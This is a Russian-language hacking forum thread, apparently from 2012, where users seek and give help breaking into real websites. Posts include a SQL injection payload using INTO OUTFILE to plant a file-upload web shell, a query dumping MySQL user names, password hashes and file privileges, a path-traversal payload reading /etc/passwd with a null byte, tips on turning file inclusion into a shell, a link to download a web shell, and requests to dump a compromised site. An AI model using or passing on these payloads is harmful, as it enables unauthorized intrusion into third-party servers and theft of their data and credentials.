Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    ты пути от фонаря нарисовал? там ковычка вызывает ошибку, тоесть фиг ты запишешь чтото в файл, да и права врятли есть


    вариант искать на сайте инклуд, иначе никак
     
    #20181 qaz, 19 Apr 2012
    Last edited: 19 Apr 2012
  2. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    Пытаюсь лить шелл,ничего не получается,при таком запросе +union+select+1,2,3,'<html>
    <head>
    <title>
    a
    </title>
    </head>
    <body>
    <form action="upload.php" method="post" enctype="multipart/form-data">
    <label for="file">Файл:</label><br/>
    <input type="file" name="file" id="file" class="input"/><br>
    <input type="submit" type=submit value="Отправить">
    </form>
    </body>
    </html>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+into+outfile+'/var/www/html/azaz.html'-- только лишь на странице с которой пытаюсь зальть шелл изменяется титл,но остается ошибка The following errors has been found:
    HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ' at line 3 (# 256).
    The following will be reported to the Administrator:
    Error in line 7 of file /var/www/html/PHPscripts/error_inc.php..А файл залить не удается
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
  4. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    А как их обойти можно?
     
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204

    Только HTML формы, только хардкод!!11

    1. Да, там magic_quotes.
    Обойти можно, только если данные из SQL-запроса используються в дальнейших запросах.
    Вот сам способ:
    http://forum.antichat.ru/showpost.php?p=663815&postcount=39

    2. Ты уверен, что у твоего пользователя есть file_priv? =\

    3. HTML - это крута!!1
     
  6. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    Уверен что у него Y я файлы могу читать
     
  7. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    Даже те методы обхода не помогают или я не понл как им пользоваться
     
  8. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Значит не повезло.
    Делай
    Code:
    select concat_ws(0x3a,Host,User,Password,File_priv) from mysql.user
    Дальше ищи phpmyadmin.
     
  9. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    А как его найти?
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    ищеш дерикторю
    http://forum.antichat.ru/showpost.php?p=3107725&postcount=2
     
  11. x1ds

    x1ds New Member

    Joined:
    18 Apr 2011
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Возник вопрос:
    Как вывести все базы данных database() ?
     
  12. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    schema_name from information_schema.schemata
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    а можно подобнее? где что смотреть что гуглить?
     
  14. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    138
    Likes Received:
    30
    Reputations:
    1
    Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?
     
  15. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Подскажите, кто-нибудь пользовался данной багой?
    Если наглядный пример использования?

    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1180

    Nginx buffer underflow vulnerability

    Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
    Affected items
    Web Server
    The impact of this vulnerability
    Remote attackers may execute arbitrary code via crafted HTTP requests.
     
  16. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,051
    Likes Received:
    613
    Reputations:
    690
    ставишь шелл http://profexer.name/pas/download.php

    - Файловый менеджер :
    групповое удаление, перемещение, копирование, скачка и загрузка файлов и директорий.
    переименование и создание файлов и директорий.
    правка, просмотр, изменении атрибутов файлов.
    поиск файлов и директорий, текста в файлах.
    Нормально все работает, просто вводи желаемый логин и пароль - скачаешь зашифрованный шелл. Только не забудь потом эти самый логин/пароль - подсмотреть их не будет где
     
    _________________________
    #20196 shell_c0de, 20 Apr 2012
    Last edited: 20 Apr 2012
  17. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    138
    Likes Received:
    30
    Reputations:
    1

    есть еще шеллы на подобие этого?
    именно этот не хочет работать
     
  18. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    delete
     
    #20198 asiaman, 20 Apr 2012
    Last edited: 20 Apr 2012
  19. swad

    swad New Member

    Joined:
    14 Nov 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Есть сайт с php include
    Вид: index.php?sub_cat=
    В начале добавляется sub/ , в конце .php
    Попробовал получить /etc/passwd с нулевым байтом в конце, сработало.
    Конструкция вида ../../../../../../../../../../etc/passwd%00 отлично работает, sub/ в начале не добавляется.
    Возникает вопрос, а как залить шелл? Как отбросить в начале sub/ ?
    Через /proc/self/environ не получается, данные не пишутся
     
  20. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    sub ты откидываешь когда выходишь из деректории, т.е. типа ../../..
    Насчет шела, иши все что можно проинклудить, логи, письма, картинку может может залить можешь там, фичу с протоколом data тоже попробуй. Тут где то были пару статей которые нормально тему сисек раскрывают.
     
Loading...
Thread Status:
Not open for further replies.